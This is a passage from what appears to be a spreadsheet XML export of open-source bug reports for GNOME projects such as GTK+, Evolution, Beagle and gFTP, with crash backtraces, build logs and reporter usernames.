    <t>GTK+-111735</t>
  </si>
  <si>
    <t>gtk_drag_source_set_icon_stock doesn't actually set the icon</t>
  </si>
  <si>
    <t>gtk_drag_source_set_icon_stock doesn't actually set the icon to the stock icon. patch on the way.</t>
  </si>
  <si>
    <t>bordoley</t>
  </si>
  <si>
    <t>GTK+-433642</t>
  </si>
  <si>
    <t>Cleanups for compiler warnings in gtk+</t>
  </si>
  <si>
    <t>Patch attached.
Fixes warnings like
- unused variables
- warn_unused_result
- incompatible type
- discards qualifiers</t>
  </si>
  <si>
    <t>EVOLUTION-231861</t>
  </si>
  <si>
    <t>Crash after using adress book</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 1.1.1.99
Synopsis: Crash after using adress book
Bugzilla-Product: Evolution
Bugzilla-Component: Contacts [was: Addressbook]
Description:
The adress book crashed a while after using it.
Debugging Information:
[New Thread 1024 (LWP 2650)]
0x41119369 in __wait4 () at __wait4:-1
	in __wait4
#0  0x41119369 in __wait4 () at __wait4:-1
#1  0x411957b0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x403e092e in waitpid (pid=2848 stat_loc=0xbfffe93c options=0)
    at wrapsyscall.c:172
#3  0x40bc59c6 in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x403de4f3 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135624136 esi = 135681944 ebp = 3221221256 esp = 3221220580 ebx = 1089132340 edx = 4294967295 ecx = 0 eax = 0 trapno = 14 err = 4 eip = 1088689320 cs = 35 __csh = 0 eflags = 2163334 esp_at_signal = 3221220580 ss = 43 __ssh = 0 fpstate = 0xbfffea68 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#5  
#6  0x40e414a8 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#7  0x40e149f3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#8  0x40e44046 in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#9  0x40e434a7 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#10 0x40e4151c in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#11 0x400b07ac in backend_died_cb (cl=0x8198b38 user_data=0x8158d80)
    at e-book.c:408
#12 0x40e149f3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#13 0x40e44046 in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#14 0x40e434a7 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#15 0x40e4151c in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#16 0x4023e514 in ping_component_callback (user_data=0x8198b38)
    at e-component-listener.c:149
#17 0x40ef7f10 in g_timeout_dispatch (source_data=0x8198b60 
    dispatch_time=0xbffff7c0 user_data=0x8198b38) at gmain.c:1302
#18 0x40ef7055 in g_main_dispatch (dispatch_time=0xbffff7c0) at gmain.c:656
#19 0x40ef7659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#20 0x40ef77e8 in g_main_run (loop=0x80f7d98) at gmain.c:935
#21 0x40e13203 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#22 0x404ae53b in bonobo_main () from /usr/lib/libbonobo.so.2
#23 0x08061ff4 in main (argc=3 argv=0xbffff8c4) at addressbook-factory.c:105
#24 0x41081336 in __libc_start_main (main=0x8061f14  argc=3 
    ubp_av=0xbffff8c4 init=0x805b6e4  fini=0x80a89a0  
    rtld_fini=0x4000d2fc  stack_end=0xbffff8bc)
    at ../sysdeps/generic/libc-start.c:129
Thread 1 (Thread 1024 (LWP 2650)):
#0  0x41119369 in __wait4 () at __wait4:-1
#1  0x411957b0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x403e092e in waitpid (pid=2848 stat_loc=0xbfffe93c options=0)
    at wrapsyscall.c:172
#3  0x40bc59c6 in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x403de4f3 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135624136 esi = 135681944 ebp = 3221221256 esp = 3221220580 ebx = 1089132340 edx = 4294967295 ecx = 0 eax = 0 trapno = 14 err = 4 eip = 1088689320 cs = 35 __csh = 0 eflags = 2163334 esp_at_signal = 3221220580 ss = 43 __ssh = 0 fpstate = 0xbfffea68 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#5  
#6  0x40e414a8 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#7  0x40e149f3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#8  0x40e44046 in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#9  0x40e434a7 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#10 0x40e4151c in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#11 0x400b07ac in backend_died_cb (cl=0x8198b38 user_data=0x8158d80)
    at e-book.c:408
#12 0x40e149f3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#13 0x40e44046 in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#14 0x40e434a7 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#15 0x40e4151c in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#16 0x4023e514 in ping_component_callback (user_data=0x8198b38)
    at e-component-listener.c:149
#17 0x40ef7f10 in g_timeout_dispatch (source_data=0x8198b60 
    dispatch_time=0xbffff7c0 user_data=0x8198b38) at gmain.c:1302
#18 0x40ef7055 in g_main_dispatch (dispatch_time=0xbffff7c0) at gmain.c:656
#19 0x40ef7659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#20 0x40ef77e8 in g_main_run (loop=0x80f7d98) at gmain.c:935
#21 0x40e13203 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#22 0x404ae53b in bonobo_main () from /usr/lib/libbonobo.so.2
#23 0x08061ff4 in main (argc=3 argv=0xbffff8c4) at addressbook-factory.c:105
#24 0x41081336 in __libc_start_main (main=0x8061f14  argc=3 
    ubp_av=0xbffff8c4 init=0x805b6e4  fini=0x80a89a0  
    rtld_fini=0x4000d2fc  stack_end=0xbffff8bc)
    at ../sysdeps/generic/libc-start.c:129
0x41119369	-1	in __wait4
#0  0x41119369 in __wait4 () at __wait4:-1
-1	in __wait4
No locals.
#1  0x411957b0 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x403e092e in waitpid (pid=2848 stat_loc=0xbfffe93c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffe93c
options = 0
result = 0
oldtype = 0
#3  0x40bc59c6 in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x403de4f3 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135624136 esi = 135681944 ebp = 3221221256 esp = 3221220580 ebx = 1089132340 edx = 4294967295 ecx = 0 eax = 0 trapno = 14 err = 4 eip = 1088689320 cs = 35 __csh = 0 eflags = 2163334 esp_at_signal = 3221220580 ss = 43 __ssh = 0 fpstate = 0xbfffea68 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
	in signals.c
self = 0x403e74a0
in_sighandler = 0x0
self = 0x403e74a0
in_sighandler = 0x0
#5  
No locals.
#6  0x40e414a8 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#7  0x40e149f3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
Unknown reporter: singularity@home.no changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>singularity</t>
  </si>
  <si>
    <t>BEAGLE-347057</t>
  </si>
  <si>
    <t>Soft line breaks don't separate words in OpenDocument Text and StarOffice Writer documents</t>
  </si>
  <si>
    <t>Please describe the problem:
Indexing Opendocument .odt StarOffice .sxw files doesn't work correctly - words separated by a line break run together. Microsoft Word documents seem to be indexed correctly.
Steps to reproduce:
1. Create a new document in OpenOffice Writer with some text separated by Shift-Enter line breaks
2. Save as beagle-test.odt beagle-test.sxw beagle-test.doc
3. Run beagle-extract-content on each of the documents you created.
Actual results:
Pasted from Konsole:
$:~&gt; beagle-extract-content beagle-test.odt
Filename: file:///home/test/beagle-test.odt
Debug: Loaded 46 filters from /usr/lib/beagle/Filters/Filters.dll
Filter: Beagle.Filters.FilterOpenOffice
MimeType: application/vnd.oasis.opendocument.text
Properties:
  fixme:page-count = 1
  fixme:word-count = 22
Content:
This is adocument test filewhere each lineis separatedby a soft linebreak (done byshift-return inOpenOffice.org)
(no hot content)
$:~&gt; beagle-extract-content beagle-test.doc
Filename: file:///home/test/beagle-test.doc
Debug: Loaded 46 filters from /usr/lib/beagle/Filters/Filters.dll
Warn: DocumentSummaryInformationStream not found in /home/test/beagle-test.doc
Filter: Beagle.Filters.FilterDOC
MimeType: application/msword
Debug: Word document extraction done in .00s
Content:
This is a document test file where each line is separated by a soft line break (done by shift-return in OpenOffice.org)
Expected results:
Soft line break should split words.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>dbera.web</t>
  </si>
  <si>
    <t>GFTP-359651</t>
  </si>
  <si>
    <t>gftpui_common_thread_callback use of alarm() doesn't work with pthreads</t>
  </si>
  <si>
    <t>Please describe the problem:
The _gftpui_common_thread_callback() function can be invoked from a pthread's work function and it sets a sigjmp_buf at its beginning.  It subsequently uses the alarm() syscall to schedule a SIGALRM at a future point the idea being that when the SIGALRM arrives the signal handler siglongjmp()s back to the start of this function (to retry an operation).  
However the SIGALRM arrives in the initial thread (thread 1) NOT the second worker thread from which the sigjmp_buf was initialised!  The effect of this is that the first thread longjmps into the second thread (and will be sharing a stack).  This has been observed on OpenSolaris and SLES10 x86-64.
Steps to reproduce:
1. FTP connect to a server that exists but is not listening on port 21 (ECONNREFUSED)
2. The message 'retrying in 30 secs' is displayed
3. The app never returns and becomes unresponsive.
Actual results:
The app hangs - both the main (UI) thread and the second worker thread are sitting in the pause()/alarm() loop in _gftpui_common_thread_callback()
Expected results:
UI remains repsonsive
Does this happen every time?
Yes
Other information:
Instead of pause() / longjmp a better solution would be a pthread mutex with which the initial thread's SIGALRM handler wakes up the worker thread.</t>
  </si>
  <si>
    <t>matt-bz</t>
  </si>
  <si>
    <t>GIMP-WEB-159035</t>
  </si>
  <si>
    <t>Link http://registry.gimp.org/ don't function</t>
  </si>
  <si>
    <t>click on the link Plug-In Registry at the bottom of the home page 
http://www.gimp.org. The following message error is displayed:
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to 
complete your request.
Please contact the server administrator ingo@blank.pages.de and inform them of 
the time the error occurred and anything you might have done that may have 
caused the error.
More information about this error may be available in the server error log.
--------------------------------------------------------------------------------
Apache/1.3.27 Server at registry.gimp.org Port 80</t>
  </si>
  <si>
    <t>jelmorini</t>
  </si>
  <si>
    <t>EVOLUTION-466796</t>
  </si>
  <si>
    <t>Crash in evolution on start-up</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Start evolution.
Stack trace:
CalDAV Eplugin starting up ...
GConf-CRITICAL **: gconf_client_get: assertion `GCONF_IS_CLIENT (client)' failed
aborting...
Program received signal SIGABRT Aborted.
[Switching to Thread -1233234240 (LWP 8796)]
0xffffe410 in __kernel_vsyscall ()
(gdb) thread apply all bt
Thread 1 (Thread -1233234240 (LWP 8796)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7b64df0 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0xb7b66641 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0xb685db33 in IA__g_logv (log_domain=0xb73a7897 GConf log_level=G_LOG_LEVEL_CRITICAL 
    format=0xb68b9e29 %s: assertion `%s' failed 
    args1=0xbf8621ec h\200:ï¿½y\200:ï¿½ï¿½ï¿½:ï¿½8\\206ï¿½ï¿½ï¿½9ï¿½\227x:ï¿½h\200:ï¿½y\200:ï¿½\200ï¿½=ï¿½\b)
    at gmessages.c:497
#4  0xb685dbe0 in IA__g_log (log_domain=0xb73a7897 GConf log_level=G_LOG_LEVEL_CRITICAL 
    format=0xb68b9e29 %s: assertion `%s' failed) at gmessages.c:517
#5  0xb685dc3c in IA__g_return_if_fail_warning (log_domain=0xb73a7897 GConf 
    pretty_function=0xb73a8068 gconf_client_get 
    expression=0xb73a8079 GCONF_IS_CLIENT (client)) at gmessages.c:532
#6  0xb739acef in gconf_client_get (client=0x0 
    key=0xb5b09eac /apps/evolution/calendar/tasks/selected_tasks err=0xbf862268)
    at gconf-client.c:1336
#7  0xb739b83f in gconf_client_get_list (client=0x0 
    key=0xb5b09eac /apps/evolution/calendar/tasks/selected_tasks 
    list_type=GCONF_VALUE_STRING err=0x0) at gconf-client.c:1589
#8  0xb5a337f2 in calendar_config_get_tasks_selected () at calendar-config.c:831
#9  0xb5acf6c9 in ensure_sources (component=0x80a2a60) at tasks-component.c:208
#10 0xb5ad255c in tasks_component_init (component=0x80a2a60 klass=0x83088f0)
    at tasks-component.c:1394
#11 0xb69232db in IA__g_type_create_instance (type=135111696) at gtype.c:1569
#12 0xb690b24e in g_object_constructor (type=135111696 n_construct_properties=1 
    construct_params=0x80d8880) at gobject.c:1046
#13 0xb74079fe in bonobo_object_constructor (type=135111696 n_construct_properties=1 
    construct_properties=0x80d8880) at bonobo-object.c:820
#14 0xb690a9e7 in IA__g_object_newv (object_type=135111696 n_parameters=0 parameters=0x0)
    at gobject.c:937
#15 0xb690ae50 in IA__g_object_new_valist (object_type=135111696 first_property_name=0x0 
    var_args=0xbf862598 ) at gobject.c:986
#16 0xb690a540 in IA__g_object_new (object_type=135111696 first_property_name=0x0)
    at gobject.c:795
#17 0xb5ad2597 in tasks_component_peek () at tasks-component.c:1405
#18 0xb5ac042c in factory (factory=0x80a2a00 
    component_id=0x80d62e1 OAFIID:GNOME_Evolution_Tasks_Component:2.12 closure=0x0)
    at main.c:171
#19 0xb741690f in bonobo_marshal_OBJECT__STRING (closure=0x82cdce8 return_value=0xbf862868 
    n_param_values=2 param_values=0x80d5c88 invocation_hint=0x0 marshal_data=0x0)
    at bonobo-marshal.c:203
#20 0xb6907468 in IA__g_closure_invoke (closure=0x82cdce8 return_value=0xbf862868 
    n_param_values=2 param_values=0x80d5c88 invocation_hint=0x0) at gclosure.c:490
#21 0xb7417cfc in bonobo_closure_invoke_va_list (closure=0x82cdce8 return_value=0xbf862868 
    var_args=0xbf8628f0 Xï¿½\b\001) at bonobo-types.c:404
#22 0xb7417f94 in bonobo_closure_invoke (closure=0x82cdce8 return_type=134872720)
    at bonobo-types.c:467
#23 0xb73ff954 in bonobo_generic_factory_new_generic (factory=0x80a2a00 
    act_iid=0x80d62e1 OAFIID:GNOME_Evolution_Tasks_Component:2.12)
    at bonobo-generic-factory.c:276
#24 0xb740f610 in bonobo_shlib_factory_new_generic (factory=0x80a2a00 
    act_iid=0x80d62e1 OAFIID:GNOME_Evolution_Tasks_Component:2.12)
    at bonobo-shlib-factory.c:155
#25 0xb73ff32d in impl_Bonobo_ObjectFactory_createObject (servant=0x80a2a14 
    obj_act_iid=0x80d62e1 OAFIID:GNOME_Evolution_Tasks_Component:2.12 ev=0xbf862c80)
    at bonobo-generic-factory.c:81
#26 0xb73cfa97 in _ORBIT_skel_small_Bonobo_GenericFactory_createObject (
    _o_servant=0x80a2a14 _o_retval=0xbf862a20 _o_args=0xbf862a1c _o_ctx=0x0 
    _o_ev=0xbf862c80 _impl_createObject=0xb73ff20c )
    at Bonobo_GenericFactory-common.c:16
#27 0xb734ff9b in ORBit_c_stub_invoke (obj=0x80d6288 methods=0xb73ddfc4 method_index=0 
    ret=0xbf862a20 args=0xbf862a1c ctx=0x0 ev=0xbf862c80 class_id=15 method_offset=4 
    skel_impl=0xb73cfa70 )
    at poa.c:2630
#28 0xb73d1f95 in Bonobo_GenericFactory_createObject (_obj=0x80d6288 
    iid=0x80d62e1 OAFIID:GNOME_Evolution_Tasks_Component:2.12 ev=0xbf862c80)
    at Bonobo_GenericFactory-stubs.c:13
#29 0xb73d4321 in bonobo_activation_activate_shlib_server (sh=0x82ce8c4 ev=0xbf862c80)
    at bonobo-activation-shlib.c:203
#30 0xb73d4c0e in handle_activation_result (result=0x82ce8c4 ret_aid=0x0 ev=0xbf862c80)
    at bonobo-activation-activate.c:315
#31 0xb73d4e26 in bonobo_activation_activate (
    requirements=0xbf862b90 iid == 'OAFIID:GNOME_Evolution_Tasks_Component:2.12' 
    selection_order=0x0 flags=0 ret_aid=0x0 opt_ev=0xbf862c80)
    at bonobo-activation-activate.c:395
#32 0xb73d4f7d in bonobo_activation_activate_from_id (
    aid=0x82d99c1 OAFIID:GNOME_Evolution_Tasks_Component:2.12 flags=0 ret_aid=0x0 
    opt_ev=0xbf862c80) at bonobo-activation-activate.c:437
#33 0x08050e35 in query_components (registry=0x81e09a0) at e-component-registry.c:192
#34 0x080512c1 in e_component_registry_peek_list (registry=0x81e09a0)
    at e-component-registry.c:295
#35 0x0805349c in e_shell_construct (shell=0x80a2b50 
    iid=0x8060a48 OAFIID:GNOME_Evolution_Shell:2.12 
    startup_line_mode=E_SHELL_STARTUP_LINE_MODE_CONFIG) at e-shell.c:691
#36 0x08053598 in e_shell_new (startup_line_mode=E_SHELL_STARTUP_LINE_MODE_CONFIG 
    construct_result_return=0xbf862dfc) at e-shell.c:739
#37 0x0805f1a8 in idle_cb (uris=0x0) at main.c:334
#38 0x0805efa9 in show_development_warning () at main.c:265
#39 0x0805f9eb in main (argc=1 argv=0xbf862f64) at main.c:591
Other information:</t>
  </si>
  <si>
    <t>rouslan</t>
  </si>
  <si>
    <t>EVOLUTION-266197</t>
  </si>
  <si>
    <t>Browsing attached mail crashes evo</t>
  </si>
  <si>
    <t>The attached mailreceived in mono-patches lists makes evoution crash
badly when viewed. I couldn't get a nice stack trace because i have no
debugging symbols installed here.</t>
  </si>
  <si>
    <t>gonzalo</t>
  </si>
  <si>
    <t>BANSHEE-399570</t>
  </si>
  <si>
    <t>Dropping playlist on MSC DAP should transfer playlist's songs</t>
  </si>
  <si>
    <t>Drag and drop of a playlist onto a DAP device should transfer or sync all files in that playlist with the device.  Currently you have to load the playlist select all files and then drag/drop to DAP device to transfer them.
Other information:</t>
  </si>
  <si>
    <t>fuchs.jason</t>
  </si>
  <si>
    <t>RHYTHMBOX-338062</t>
  </si>
  <si>
    <t>metadata reader gets lots of 'internal data flow' errors</t>
  </si>
  <si>
    <t>I see a lot of 'internal data flow error' messages when importing directories with various non-audio files.</t>
  </si>
  <si>
    <t>EVOLUTION-271810</t>
  </si>
  <si>
    <t>Calendar not enabled if editor adds event</t>
  </si>
  <si>
    <t>Description of Problem:
When creating a new account the personal calendar
is not enabled by default. This is confusing
because users can create calendar entries but not
see them.
Steps to reproduce the problem:
1. Create a new account.
2. Click on the Calendar button.
3. Right-click on any 30-minute section of the
Today view and create an entry.
Actual Results:
The entry is made but it does not appear.
Expected Results:
The entry should be visible.
How often does this happen? 
Every time.
Additional Information:
The workaround is simple -- enable the local
calendar. However for a new user this behavior
is totally unexpected and the solution is not
obvious. (Most users do not expect there to be
support for multiple calendars much less
calendars that can be enabled/disabled.)
This issue was first reported on the
users@lists.ximian.com mailing list on 17 January
2005 by Charles W. Stevenson. Refer to the topic
Calendar not showing appointments for the
discussion thread.</t>
  </si>
  <si>
    <t>jnmnus</t>
  </si>
  <si>
    <t>LIBGNOME-333364</t>
  </si>
  <si>
    <t>gnome-open fails to open uris with non ascii characters encoded as %xx</t>
  </si>
  <si>
    <t>Please describe the problem:
When using special characters like Ã¡ Ã³ Ã£ Ã§ in the file names the
beagle-live handler finds the file but I'm unable to open it (nothing happens). 
This also happens when one of the parent folders where the file is located
contain some of these caracters.
Beagle (0.2.1 Ubuntu) is working OK even with special characters.
Steps to reproduce:
Create a file with some special character (aÃ§Ã£o for example) wait until
Beagle recognizes it and try looking for it with the beagle-live handler. The
same can be applied for folders (all the files inside them doesn't matter if
they have special charaters or not won't work correctly).
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>alnvdl</t>
  </si>
  <si>
    <t>DOXYGEN-320740</t>
  </si>
  <si>
    <t>PHP associative arrays not documented properly</t>
  </si>
  <si>
    <t>Version details: 1.4.5 too
Distribution/Version: Mandriva Linux release 2006.1 (Cooker) for i586
I have a file that consists of several members of an associative array
being set like this:
&lt;?php
$config['version'] = v1.0rc0   ///&lt; version
$config['site'] = SiteName   ///&lt; name of the site
$config['win_title'] = $config['site']   ///&lt; base title (of browser windows)
$config['Text Column Width'] = 600   ///&lt; Width of columnar text
$config['base dir'] = /site   ///&lt; Where is site (URL)?
$config['css dir'] = $config['base dir'] ./css   ///&lt; base
Cascading StyleSheet location
$config['img dir'] = $config['base dir'] ./images   ///&lt; non-themed
image location
$config['lib dir'] = $config['base dir'] ./libraries    ///&lt;
libraries means client side scripts
$config['theme dir'] = $config['base dir'] ./themes   ///&lt; Themes
container directory
?&gt;
The problem is Doxygen only sees $config['version'] all subsequent array
members are ignored.</t>
  </si>
  <si>
    <t>boinger</t>
  </si>
  <si>
    <t>NETWORKMANAGER-454739</t>
  </si>
  <si>
    <t>VPN: openvpn</t>
  </si>
  <si>
    <t>NetworkManager-openvpn-0.3.2 (trunk) is missing -lnm-util</t>
  </si>
  <si>
    <t>Please describe the problem:
The NetworkManager-openvpn-0.3.2 from trunk does not link against libnm-util and thus cannot use its dictionary functions.
Steps to reproduce:
1. ./autogen.sh
2. ./configure
3. make
Actual results:
Build failure
Expected results:
Build ok
Does this happen every time?
yes in trunk
Other information:</t>
  </si>
  <si>
    <t>robert.buchholz</t>
  </si>
  <si>
    <t>GTHUMB-144273</t>
  </si>
  <si>
    <t>gthumb fails compile with libexif 0.6.9</t>
  </si>
  <si>
    <t>creating libphotoimporter.la
(cd .libs &amp;&amp; rm -f libphotoimporter.la &amp;&amp; ln -s ../libphotoimporter.la
libphotoimporter.la)
if gcc -DHAVE_CONFIG_H -I. -I. -I.. -pthread -DORBIT2=1 -I/usr/include/glib-2.0
-I/usr/lib/glib-2.0/include -I/usr/include/gtk-2.0 -I/usr/lib/gtk-2.0/include
-I/usr/include/atk-1.0 -I/usr/include/pango-1.0 -I/usr/X11R6/include
-I/usr/include/freetype2 -I/usr/include/freetype2/config
-I/usr/include/libgnome-2.0 -I/usr/include/orbit-2.0
-I/usr/include/libbonobo-2.0 -I/usr/include/gconf/2 -I/usr/include/gnome-vfs-2.0
-I/usr/lib/gnome-vfs-2.0/include -I/usr/include/bonobo-activation-2.0
-I/usr/include/libgnomeui-2.0 -I/usr/include/libgnomecanvas-2.0
-I/usr/include/libart-2.0 -I/usr/include/libbonoboui-2.0 -I/usr/include/libxml2
-I/usr/include/gnome-vfs-module-2.0 -I/usr/include/libglade-2.0
-I/usr/include/libgnomeprint-2.2 -I/usr/include/libgnomeprintui-2.2  
-I/usr/include/libexif    -I/usr/include/gphoto2   -DGTHUMB_PREFIX=\/usr\
-DGTHUMB_SYSCONFDIR=\/etc\ -DGTHUMB_DATADIR=\/usr/share\
-DGTHUMB_LIBDIR=\/usr/lib\ -DPIXMAPSDIR=\/usr/share/pixmaps/\
-DBONOBO_UIDIR=\/\ -DGTHUMB_GLADEDIR=\/usr/share/gthumb/glade\
-I../libgthumb    -O -march=athlon-mp -mmmx -mfpmath=sse -msse -m3dnow -pipe -O3
-MT gth-exif-data-viewer.o -MD -MP -MF .deps/gth-exif-data-viewer.Tpo \
  -c -o gth-exif-data-viewer.o `test -f 'gth-exif-data-viewer.c' || echo
'./'`gth-exif-data-viewer.c \
then mv -f .deps/gth-exif-data-viewer.Tpo .deps/gth-exif-data-viewer.Po \
else rm -f .deps/gth-exif-data-viewer.Tpo exit 1 \
fi
gth-exif-data-viewer.c: In function `update_exif_data':
gth-exif-data-viewer.c:376: error: too few arguments to function
`exif_entry_get_value'
make[4]: *** [gth-exif-data-viewer.o] Error 1
make[4]: Leaving directory `/usr/src/gthumb-2.4.0/src'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/usr/src/gthumb-2.4.0/src'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/usr/src/gthumb-2.4.0'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/usr/src/gthumb-2.4.0'</t>
  </si>
  <si>
    <t>rcook</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-142517</t>
  </si>
  <si>
    <t>Combo box in desktop background capplet not read by gnopernicus</t>
  </si>
  <si>
    <t>Tab to the 'Desktop Colors' combo box. Click on the combo box to expand the
items available for selection. The menu items are not read by gnopernicus. All
that the user hears is Menu Item Available
The same behaviour is seen for 'Style' combo box too.</t>
  </si>
  <si>
    <t>muktha.narayan</t>
  </si>
  <si>
    <t>GNUMERIC-417981</t>
  </si>
  <si>
    <t>Format regression: multiple of pi</t>
  </si>
  <si>
    <t>When using ?pi/? format if the denominator equals to 1 the displayed result should be displayed nÏ€ (or Ï€ if n=1) instead of nÏ€/1 currently.</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-464768</t>
  </si>
  <si>
    <t>pygtk &lt; 2.8.0 compat code refers to obsolete DeskbarAppletButton name</t>
  </si>
  <si>
    <t>Please describe the problem:
The compatibility code for gtk &lt; 2.8.0 in deskbar/ui/DeskbarApplet.py refers to DeskbarAppletButton which seems to be just DeskbarApplet now. Found by pyflakes.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GTK+-85882</t>
  </si>
  <si>
    <t>Widget: GtkTreeView</t>
  </si>
  <si>
    <t>compiler warning for gtktreemodelsort.c</t>
  </si>
  <si>
    <t>Compiling GTK+ 2.0.5 on Solaris 8 with Sun C/C++ 5.0
Receive the following compiler warnings:
gtktreemodelsort.c line 312: warning: assignment type mismatch:
        pointer to function(pointer to struct _GtkTreeModel {}) returning 
enum .101fake {GTK_TREE
_MODEL_LIST_ONLY(2) GTK_TREE_MODEL... = pointer to function(pointer to 
struct _GtkTreeModel {}
) returning uint</t>
  </si>
  <si>
    <t>gtktreeview-bugs</t>
  </si>
  <si>
    <t>cooperdl</t>
  </si>
  <si>
    <t>EVOLUTION-251619</t>
  </si>
  <si>
    <t>Crash opening settings dialog</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: GNOME2.2.2 1.5
os_details: Ximian Inc.
Synopsis: Crash opening settings dialog
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Crash opening settings dialog
Debugging Information:
Backtrace was generated from '/opt/gnome2/bin/evolution-1.5'
[New Thread 16384 (LWP 9255)]
[New Thread 32769 (LWP 9257)]
[New Thread 16386 (LWP 9258)]
[New Thread 32771 (LWP 9259)]
[New Thread 49156 (LWP 9260)]
[New Thread 65541 (LWP 9261)]
[New Thread 98311 (LWP 9263)]
0x409c5d2a in waitpid () from /lib/libpthread.so.0
#0  0x409c5d2a in waitpid () from /lib/libpthread.so.0
#1  0x40388fd2 in libgnomeui_module_info_get ()
   from /opt/gnome2/lib/libgnomeui-2.so.0
#2  0x08067777 in segv_redirect (sig=11) at main.c:481
#3  0x409c4895 in __pthread_sighandler () from /lib/libpthread.so.0
#4  
#5  0x415a0a01 in strlen () from /lib/libc.so.6
#6  0x409709f7 in giop_send_buffer_append_string ()
   from /usr/lib/libORBit-2.so.0
#7  0x4097f9e6 in ORBit_marshal_value () from /usr/lib/libORBit-2.so.0
#8  0x40975e7b in ORBit_small_freekids () from /usr/lib/libORBit-2.so.0
#9  0x409764c9 in ORBit_small_invoke_stub () from
/usr/lib/libORBit-2.so.0
#10 0x409763a7 in ORBit_small_invoke_stub_n () from
/usr/lib/libORBit-2.so.0
#11 0x4098cb7e in ORBit_c_stub_invoke () from /usr/lib/libORBit-2.so.0
#12 0x4002ce0b in GNOME_Evolution_Shell_createNewWindow (_obj=0x823e820
    component_id=0x0 ev=0xbffff660) at Evolution-stubs.c:2044
#13 0x0806769a in idle_cb (data=0x0) at main.c:439
#14 0x414db041 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
#15 0x414d7fc3 in unblock_source () from /usr/lib/libglib-2.0.so.0
#16 0x414d90f8 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#17 0x414d9559 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#18 0x414d9de7 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#19 0x4076d706 in bonobo_main () from /opt/gnome2/lib/libbonobo-2.so.0
#20 0x08067c82 in main (argc=3 argv=0xbffff9f4) at main.c:619
#21 0x4153a8ae in __libc_start_main () from /lib/libc.so.6
Thread 7 (Thread 98311 (LWP 9263)):
#0  0x4154e768 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x409c1198 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x409bdd4e in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x4009e4f7 in e_msgport_wait (mp=0x80f5008) at e-msgport.c:302
	_buffer = {__routine = 0x4009e25f  
  __arg = 0x80f5008 __canceltype = -1092617676 __prev = 0x0}
	msg = (EMsg *) 0x0
#4  0x4009ee0f in thread_dispatch (din=0x80f5660) at e-msgport.c:665
